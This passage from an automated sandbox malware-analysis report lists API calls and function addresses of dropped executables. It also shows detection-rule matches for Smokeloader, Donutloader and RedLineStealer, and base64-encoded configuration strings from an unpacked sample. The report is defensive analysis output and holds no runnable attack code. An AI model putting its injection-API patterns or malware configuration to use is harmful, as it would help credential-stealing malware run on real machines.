                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_00401579
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_0040157C
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B906900 RtlAllocateHeap,NtQuerySystemInformation,24_2_00007FF70B906900
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B925100 NtWriteVirtualMemory,24_2_00007FF70B925100
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B925260 NtAllocateVirtualMemory,24_2_00007FF70B925260
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B924FC0 NtReadVirtualMemory,24_2_00007FF70B924FC0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9259D0 NtProtectVirtualMemory,24_2_00007FF70B9259D0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B923F30 NtQueryInformationProcess,24_2_00007FF70B923F30
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA60765_2_00BA6076
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA6D005_2_00BA6D00
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE607617_2_00EE6076
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE6D0017_2_00EE6D00
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8DE81024_2_00007FF70B8DE810
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8DBAB024_2_00007FF70B8DBAB0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9416C024_2_00007FF70B9416C0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8C64A024_2_00007FF70B8C64A0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8EB6A024_2_00007FF70B8EB6A0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8E3AD024_2_00007FF70B8E3AD0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D5ED024_2_00007FF70B8D5ED0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8C5AD424_2_00007FF70B8C5AD4
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9004D024_2_00007FF70B9004D0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B90B6B024_2_00007FF70B90B6B0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B948AB024_2_00007FF70B948AB0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8CA0F024_2_00007FF70B8CA0F0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B92170024_2_00007FF70B921700
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D591024_2_00007FF70B8D5910
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B90151024_2_00007FF70B901510
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D3E3024_2_00007FF70B8D3E30
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8F983024_2_00007FF70B8F9830
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B91CC4024_2_00007FF70B91CC40
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8C145024_2_00007FF70B8C1450
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D005024_2_00007FF70B8D0050
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B91B02024_2_00007FF70B91B020
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B91E43024_2_00007FF70B91E430
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B93C23024_2_00007FF70B93C230
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B913E8024_2_00007FF70B913E80
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B91208024_2_00007FF70B912080
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B91586024_2_00007FF70B915860
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8F188024_2_00007FF70B8F1880
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9043B024_2_00007FF70B9043B0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8DD7A024_2_00007FF70B8DD7A0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B93DFD024_2_00007FF70B93DFD0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8EA9D024_2_00007FF70B8EA9D0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9057C024_2_00007FF70B9057C0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8DCFF024_2_00007FF70B8DCFF0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D4BF024_2_00007FF70B8D4BF0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B906DE024_2_00007FF70B906DE0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8F29E024_2_00007FF70B8F29E0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B918C1024_2_00007FF70B918C10
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B92201024_2_00007FF70B922010
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B934E1024_2_00007FF70B934E10
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8EFC1024_2_00007FF70B8EFC10
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8E4E0024_2_00007FF70B8E4E00
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8CC40024_2_00007FF70B8CC400
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D700024_2_00007FF70B8D7000
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8CBC0024_2_00007FF70B8CBC00
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9111F024_2_00007FF70B9111F0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B916DF024_2_00007FF70B916DF0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B9449F024_2_00007FF70B9449F0
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B935D4024_2_00007FF70B935D40
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D192024_2_00007FF70B8D1920
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B90955024_2_00007FF70B909550
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B90315024_2_00007FF70B903150
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B943F2024_2_00007FF70B943F20
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8F074024_2_00007FF70B8F0740
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8CFB7024_2_00007FF70B8CFB70
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B925B8024_2_00007FF70B925B80
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B92898B24_2_00007FF70B92898B
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8ED39024_2_00007FF70B8ED390
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B917D6024_2_00007FF70B917D60
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B92437024_2_00007FF70B924370
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B91F37024_2_00007FF70B91F370
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B946B7024_2_00007FF70B946B70
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C51EE28_2_00007FF7C08C51EE
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C418628_2_00007FF7C08C4186
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C3D0028_2_00007FF7C08C3D00
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C342028_2_00007FF7C08C3420
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C474228_2_00007FF7C08C4742
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08D0AB828_2_00007FF7C08D0AB8
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08D0F0D28_2_00007FF7C08D0F0D
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08CC7A028_2_00007FF7C08CC7A0
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 30_2_00007FF7C08A475230_2_00007FF7C08A4752
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 30_2_00007FF7C08A335530_2_00007FF7C08A3355
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 30_2_00007FF7C08A419630_2_00007FF7C08A4196
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 30_2_00007FF7C08A524330_2_00007FF7C08A5243
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB52E031_2_02EB52E0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC72DD31_2_02EC72DD
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED229031_2_02ED2290
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED1B5231_2_02ED1B52
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC1B2531_2_02EC1B25
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC718931_2_02EC7189
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED6F8031_2_02ED6F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB1F1031_2_02EB1F10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EE3CD031_2_02EE3CD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ECEC4031_2_02ECEC40
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EECD4031_2_02EECD40
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC82CB31_2_02EC82CB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB727031_2_02EB7270
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EBC27031_2_02EBC270
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED621031_2_02ED6210
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED4BF031_2_02ED4BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED33B631_2_02ED33B6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB6B7031_2_02EB6B70
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EED34031_2_02EED340
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EEB35031_2_02EEB350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EBFB1031_2_02EBFB10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ECE08631_2_02ECE086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EE888031_2_02EE8880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED689031_2_02ED6890
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EEB84031_2_02EEB840
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EED01031_2_02EED010
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EEA9E431_2_02EEA9E4
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED29C931_2_02ED29C9
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED41A031_2_02ED41A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB896031_2_02EB8960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EEB16031_2_02EEB160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB490031_2_02EB4900
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EE368031_2_02EE3680
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC5E9731_2_02EC5E97
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC4E6831_2_02EC4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EC367831_2_02EC3678
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED3F9731_2_02ED3F97
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EEB70031_2_02EEB700
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ED0CB731_2_02ED0CB7
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02ECEC0631_2_02ECEC06
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB5DE031_2_02EB5DE0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EB3DD031_2_02EB3DD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EEB5A031_2_02EEB5A0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FF7C08A63FB32_2_00007FF7C08A63FB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FF7C08A5E8332_2_00007FF7C08A5E83
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\B552.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02EB93B0 appears 39 times
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02EBFCA0 appears 202 times
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536
                  Source: MyProg.exe.5.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                  Source: B552.exe.14.drStatic PE information: Number of sections : 12 > 10
                  Source: 753F.exe.14.drStatic PE information: No import functions for PE file found
                  Source: F6D9.exe.14.drStatic PE information: No import functions for PE file found
                  Source: 7Y18r(14).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: IXDaI.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7Y18r(14).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: IXDaI.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ftejced.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: IXDaI.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, Settings.csBase64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
